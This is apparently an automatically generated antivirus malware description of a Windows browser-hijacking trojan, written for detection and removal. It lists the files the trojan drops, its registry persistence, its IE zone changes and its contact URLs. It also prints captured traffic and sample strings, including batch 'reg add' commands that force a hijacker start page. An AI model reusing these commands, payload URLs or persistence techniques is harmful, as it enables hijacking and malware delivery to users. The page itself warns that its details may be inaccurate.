Trojan.NSIS.StartPage_038a02ce9c

by malwarelabrobot on June 11th, 2014 in Malware Descriptions.

Trojan-Downloader.Win32.Genome.hntb (Kaspersky), Dropped:Trojan.StarPage.YZ (B) (Emsisoft), Dropped:Trojan.StarPage.YZ (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 038a02ce9cee8bc46998487a869f34b6
SHA1: 0f66aef6e9bd833439f546107751efaa4de18c77
SHA256: d8dfadaa930d2fdaf90c9a94ac64e7cbfb97c95af65517d57818d623e84ccd16
SSDeep: 3072:lgXdZt9P6D3XJ2cWiEvMweXDGqZIv8hLvOXilfzymqbMTz:le34MMPcv8hjQEumqQz
Size: 162867 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1944

File activity

The process %original file name%.exe:1944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\shandian\ico\360.ico (32 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\config0.ini (3 bytes)
%Program Files%\shandian\ico\taobao.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\ÉÁµçä¯ÀÀÆ÷.lnk (523 bytes)
%Documents and Settings%\%current user%\Desktop\360°²È«ä¯ÀÀÆ÷.lnk (1 bytes)
%Program Files%\shandian\ico\ie.ico (700 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\жÔØÉÁµçä¯ÀÀÆ÷.lnk (507 bytes)
%Program Files%\shandian\home.bat (703 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÉÁµçä¯ÀÀÆ÷\ÉÁµçä¯ÀÀÆ÷.lnk (517 bytes)
%Program Files%\shandian\ico\anquan.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\bind.dll (1989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\xID.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\config.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Program Files%\shandian\config.ini (194 bytes)
%Documents and Settings%\%current user%\Desktop\ÉÁµçä¯ÀÀÆ÷.lnk (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].htm (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].htm (0 bytes)

Registry activity

The process %original file name%.exe:1944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"DisplayName" = "ÉÁµçä¯ÀÀÆ÷"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"Publisher" = "ÉÁµç"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"URLInfoAbout" = "http://www.sd.com"
"DisplayIcon" = "%Program Files%\shandian\shandian.exe"

"UninstallString" = "%Program Files%\shandian\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÉÁµçä¯ÀÀÆ÷]
"DisplayVersion" = "1.0.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E A4 FA D9 62 31 F4 27 9A 4D 29 5A 68 3E 75 F3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\shandian]
"home.bat" = "home"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
a7d710e78711d5ab90e4792763241754 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\Md5dll.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\System.dll
e2b78c96162ad8c36a623e6a4ba1c216 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\bind.dll
3a5ed71aa9c6846d95d57235c4c443d7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\xID.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 49152 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 241664 34112 34304 4.41113 1d7b20b62d8ab9cf4e79055138b943d9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://61.160.224.199/stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-0D-DD-4A&md5=e0612474bc3b8274328178a126394f5a
hxxp://down.qicc-md.org/F30241_s_0523.rar 61.160.224.228
hxxp://www.xauter.net/stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-0D-DD-4A&md5=e0612474bc3b8274328178a126394f5a


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /F30241_s_0523.rar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Host: down.qicc-md.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.3.6
Date: Tue, 10 Jun 2014 12:14:29 GMT
Content-Type: application/octet-stream
Content-Length: 12269032
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
Last-Modified: Sun, 25 May 2014 10:57:46 GMT
Accept-Ranges: bytes
ETag: "b6af3d29878cf1:2d7"
[email protected]...........................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................p.......B...9............@..............
.............&.....O*;*[email protected].........$
..h..............H#...................................................
........................................text....o.......p.............
..... ..`.rdata...*.......,...t..............@[email protected]....~...........
...............@....ndata...P...0...........................rsrc....h.
...$..j..................@[email protected]........%[email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>


GET /stat/?v=1&ac=setup&name=%original file name%.exe&mac=00-0C-29-0D-DD-4A&md5=e0612474bc3b8274328178a126394f5a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Host: VVV.xauter.net
Cache-Control: no-cache
Cookie: ASPSESSIONIDAASRAADR=PLOOMBDDAKLJJBKODEJJBAMN


HTTP/1.1 200 OK
Server: nginx/1.4.3.6
Date: Tue, 10 Jun 2014 12:14:11 GMT
Content-Type: text/html
Content-Length: 2997
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
Who: ShanIE
Cache-control: private
[ShortCut_1]..Desc=360............Hint=360............Name=360........
....URL=hXXp://VVV.jlbnh.com..Icon=ico\360.ico..[ShortCut_2]..Desc=Int
ernet Explorer..Hint=Internet Explorer..Name=Internet Explorer..URL=ht
tp://VVV.jlbnh.com..Icon=ico\ie.ico..[SoftWare_1]..Desc=..........Hint
=..........Name=F30241_s_0523..URL=hXXp://down.qicc-md.org/F30241_s_05
23.rar..reg=HKLM\SOFTWARE\Baidu\BaiduSd\InstallDir..[SoftWare_2]..Desc
=..........Hint=..........Name=ionrkf_70688..URL=hXXp://down.qicc-md.o
rg/ionrkf_70688.rar..reg=HKLM\SOFTWARE\Baidu\BaiduAn\InstallDir..[Soft
Ware_3]..Desc=......Hint=......Name=dudu_b_55045..URL=hXXp://down.qicc
-md.org/dudu_b_55045.rar..reg=HKCU\Software\Kuping\InstallPath..[SoftW
are_4]..Desc=..........Hint=..........Name=pczh_98_2..URL=hXXp://down.
qicc-md.org/pczh_98_2.rar..reg=HKLM\SOFTWARE\Microsoft\Windows\Current
Version\App Paths\Ainqngz3.9.exe\..[SoftWare_5]..Desc=........Hint=...
.....Name=-8853_1_mvy..URL=hXXp://down.qicc-md.org/-8853_1_mvy.rar..re
g=HKLM\SOFTWARE\Mnying\Mnyingfiledir..[SoftWare_6]..Desc=...... ..Hint
=........Name=yxku_s[106]..URL=hXXp://down.qicc-md.org/yxku_s[106].rar
..reg=HKCU\Software\yxkuBox\InstallPath..[SoftWare_7]..Desc=......Hint
=......Name=xkss_50041..URL=hXXp://down.qicc-md.org/xkss_50041.rar..re
g=HKCU\Software\xuankusoso\InstallMode..[SoftWare_9]..Desc=....FM..Hin
t=....FM..Name=setup_3128..URL=hXXp://down.qicc-md.org/setup_3128.rar.
.reg=HKLM\SOFTWARE\YYMusic3\rd..[SoftWare_11]..Desc=..........Hint=...
.......Name=BaiduPlayerNetSetup_284..URL=hXXp://down.qicc-md.org/B
<<< skipped >>>


GET /F30241_s_0523.rar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Host: down.qicc-md.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.3.6
Date: Tue, 10 Jun 2014 12:14:20 GMT
Content-Type: application/octet-stream
Content-Length: 12269032
Connection: keep-alive
X-Powered-By-360WZB: wangzhan.360.cn
Last-Modified: Sun, 25 May 2014 10:57:46 GMT
Accept-Ranges: bytes
ETag: "b6af3d29878cf1:2d7"
[email protected]...........................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................p.......B...9............@..............
.............&.....O*;*[email protected].........$
..h..............H#...................................................
........................................text....o.......p.............
..... ..`.rdata...*.......,...t..............@[email protected]....~...........
...............@....ndata...P...0...........................rsrc....h.
...$..j..................@[email protected]........%[email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1944:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\bind.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\bind.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp
:.Lw|
.teCF 
.ZGw1
.uYYAaE
.2<2:26212
nsd2.tmp
0, 0, 0)
S~1\Temp\nsd2.tmp
%original file name%.exe
c:\%original file name%.exe
%Program Files%\shandian"
%Program Files%\shandian
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
)    ))8
Nullsoft Install System v2.46
%Documents and Settings%\%current user%\Start Menu\Programs\

%original file name%.exe_1944_rwx_10004000_00001000:

callback%d

cmd.exe_1768:

.text
`.data
.rsrc
KERNEL32.dll
NTDLL.DLL
msvcrt.dll
USER32.dll
SetConsoleInputExeNameW
APerformUnaryOperation: '%c'
APerformArithmeticOperation: '%c'
ADVAPI32.dll
SHELL32.dll
MPR.dll
RegEnumKeyW
RegDeleteKeyW
RegCloseKey
RegOpenKeyW
RegCreateKeyExW
RegOpenKeyExW
ShellExecuteExW
CmdBatNotification
GetWindowsDirectoryW
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
_pipe
GetProcessWindowStation
cmd.pdb
pauseelims=- tokens=1-2" %%e in ("%reglist1%") do (reg add %%a /v "%%e" /d %%f /f)
pause/f "delims=- tokens=1-2" %%e in ("%reglist1%") do (reg add %%a /v "%%e" /d %%f /f)
pausee" /d %%f /f)
for /f "delims=- tokens=1-2" %%e in ("%reglist1%") do (reg add %%a /v "%%e" /d %%f /f)
pause%") do (reg add %%a /v "%%e" /d %%f /f)
pauses=- tokens=1-3" %%b in ("%reglist2%") do (reg add %%a /v %%b /t %%c /d %%d /f)
CMD Internal Error %s
)(&&())))(&))
)&((&)&))&())
)&((&)&)&()))
)(&&()))&))))
CMD.EXE
()|&=,;"
COPYCMD
\XCOPY.EXE
CMDCMDLINE
WKERNEL32.DLL
Software\Policies\Microsoft\Windows\System
0123456789
cmd.exe
DIRCMD
%d.%d.d
Ungetting: '%s'
DisableCMD
GeToken: (%x) '%s'
%s\Shell\Open\Command
%x %c
*** Unknown type: %x
Args: `%s'
Cmd: %s Type: %x
%s (%s) %s
r /f "delims=- tokens=1-2" %e in ("Start Page-"http://www.jlbnh.com/?tn=4" ") do (reg add %a /v "%e" /d %f /f)
lbnh.com/?tn=4"") do (reg add %a /v %b /t %c /d %d /f)
a /v "%e" /d %f /f
lbnh.com/?tn
-08002B30309D}\shell\OpenHomePage\Command"
//www.jlbnh.com/?tn=4"
%Program Files%\shandian>
.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
or /f "delims=- tokens=1-2" %%e in ("%reglist1%") do (reg add %%a /v "%%e" /d %%f /f)
CMDEXTVERSION
KEYS
%Program Files%\shandian
Press any key to continue . . .
ernet Explorer\Main" /v "Start Page" /d "http://www.jlbnh.com/?tn 4" /f
orer\iexplore.exe http://www.jlbnh.com/?tn 4" /f
%s %s
(%s) %s
%s %s%s
&()[]{}^=;!%' ,`~
d%sd%s
-%sd%sd%sd
d%sd%sd
%s=%s
X-X
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
<> -*/%()|^&=,
\CMD.EXE
Windows Command Processor
5.1.2600.5512 (xpsp.080413-2111)
Cmd.Exe
Windows
Operating System
5.1.2600.5512
Press any key to continue . . . %0
operable program or batch file.
The system cannot execute the specified program.
and press any key when ready. %0
Microsoft Windows XP [Version %1]%0
a pipe operation.
KEYS is on.
KEYS is off.
The process tried to write to a nonexistent pipe.
The switch /Y may be preset in the COPYCMD environment variable.
to prompt on overwrites unless COPY command is being executed from
Switches may be preset in the DIRCMD environment variable. Override
Quits the CMD.EXE program (command interpreter) or the current batch
CMD.EXE. If executed from outside a batch script, it
will quit CMD.EXE
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
Displays or sets a search path for executable files.
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Changes the cmd.exe command prompt.
$B | (pipe)
$V Windows XP version number
Displays, sets, or removes cmd.exe environment variables.
Displays the Windows XP version.
Tells cmd.exe whether to verify that your files are written correctly to a
Records comments (remarks) in a batch file or CONFIG.SYS.
Press any key to continue . . . %0
Directs cmd.exe to a labeled line in a batch program.
NOT Specifies that Windows XP should carry out
will execute the command after the ELSE keyword if the
I The new environment will be the original environment passed
to the cmd.exe and not the current environment.
SEPARATE Start 16-bit Windows program in separate memory space
SHARED Start 16-bit Windows program in shared memory space
If it is an internal cmd command or a batch file then
the command processor is run with the /K switch to cmd.exe.
If it is not an internal cmd command or batch file then
parameters These are the parameters passed to the command/program
under Windows XP.
Starts a new instance of the Windows XP command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
/D Disable execution of AutoRun commands from registry (see below)
/A Causes the output of internal commands to a pipe or file to be ANSI
/U Causes the output of internal commands to a pipe or file to be
variable var at execution time. The %var% syntax expands variables
of an executable file.
If /D was NOT specified on the command line, then when CMD.EXE starts, it
either or both are present, they are executed first.
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
can enable or disable extensions for all invocations of CMD.EXE on a
following REG_DWORD values in the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
can enable or disable completion for all invocations of CMD.EXE on a
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
at execution time.
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
completion for all invocations of CMD.EXE on a machine and/or user logon
the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
Shift key with the control character will move through the list
&()[]{}^=;!%' ,`~
Command Processor Extensions enabled by default. Use CMD /? for details.
ASSOC [.ext[=[fileType]]]
.ext Specifies the file extension to associate the file type with
ASSOC .pl=PerlScript
FTYPE PerlScript=perl.exe %%1 %%*
script.pl 1 2 3
set PATHEXT=.pl;%%PATHEXT%%
The restartable option to the COPY command is not supported by
this version of the operating system.
The following usage of the path operator in batch-parameter
The unicode output option to CMD.EXE is not supported by this
version of the operating system.
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the PROMPT command supports
is pretty simple and supports the following operations, in decreasing
! ~ - - unary operators
* / %% - arithmetic operators
  - - arithmetic operators
&= ^= |= <<= >>=
If you use any of the logical or modulus operators, you will need to
values. If SET /A is executed from the command line outside of a
assignment operator requires an environment variable name to the left of
the assignment operator. Numeric values are decimal numbers, unless
occurrence of the remaining portion of str1.
Finally, support for delayed environment variable expansion has been
added. This support is always disabled by default, but may be
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
of text is read, not when it is executed. The following example
So the actual FOR loop we are executing is:
%Í%% - expands to the current directory string.
%ÚTE%% - expands to current date using same format as DATE command.
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDCMDLINE%% - expands to the original command line that invoked the
If Command Extensions are enabled the SHIFT command supports
control is passed to the statement after the label specified. You must
%%4 %%5 ...)
CMD /? for details.
This works because on old versions of CMD.EXE, SETLOCAL does NOT
command execution.
non-executable files may be invoked through their file association just
by typing the name of the file as a command. (e.g. WORD.DOC would
launch the application associated with the .DOC file extension).
When executing an application that is a 32-bit GUI application, CMD.EXE
the command prompt. This new behavior does NOT occur if executing
When executing a command line whose first token is the string "CMD "
without an extension or path qualifier, then "CMD" is replaced with
the value of the COMSPEC variable. This prevents picking up CMD.EXE
When executing a command line whose first token does NOT contain an
extension, then CMD.EXE uses the value of the PATHEXT
.COM;.EXE;.BAT;.CMD
When searching for an executable, if there is no match on any extension,
If Command Extensions are enabled, and running on the Windows XP
forms of the FOR command are supported:
Walks the directory tree rooted at [drive:]path, executing the FOR
passes the first blank separated token from each line of each file.
is a quoted string which contains one or more keywords to specify
different parsing options. The keywords are:
be passed to the for body for each iteration.
where a back quoted string is executed as a
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
would parse each line in myfile.txt, ignoring lines that begin with
a semicolon, passing the 2nd and 3rd token from each line to the for
line, which is passed to a child CMD.EXE and the output is captured
IF CMDEXTVERSION number command
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
CMDEXTVERSION conditional is never true when Command Extensions are
%%CMDCMDLINE%% will expand into the original command line passed to
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
already an environment variable with the name CMDCMDLINE, in which case
%%CMDEXTVERSION%% will expand into a string representation of the
current value of CMDEXTVERSION, provided that there is not already
an environment variable with the name CMDEXTVERSION, in which case you
under Windows XP, as command line editing is always enabled.
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
CMD does not support UNC paths as current directories.
UNC paths not supported for current directory. Using
to create temporary drive letter to support UNC current
Missing operand.
Missing operator.
The COMSPEC environment variable does not point to CMD.EXE.
The FAT File System only support Last Write Times
of a batch script is reached, an implied ENDLOCAL is executed for any
application execution.
The switch /Y may be present in the COPYCMD environment variable.
to prompt on overwrites unless MOVE command is being executed from
when CMD.EXE started. This value either comes from the current console
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files%\shandian\ico\360.ico (32 bytes)
    %Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\config0.ini (3 bytes)
    %Program Files%\shandian\ico\taobao.ico (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\ÉÁµçä¯ÀÀÆ÷.lnk (523 bytes)
    %Documents and Settings%\%current user%\Desktop\360°²È«ä¯ÀÀÆ÷.lnk (1 bytes)
    %Program Files%\shandian\ico\ie.ico (700 bytes)
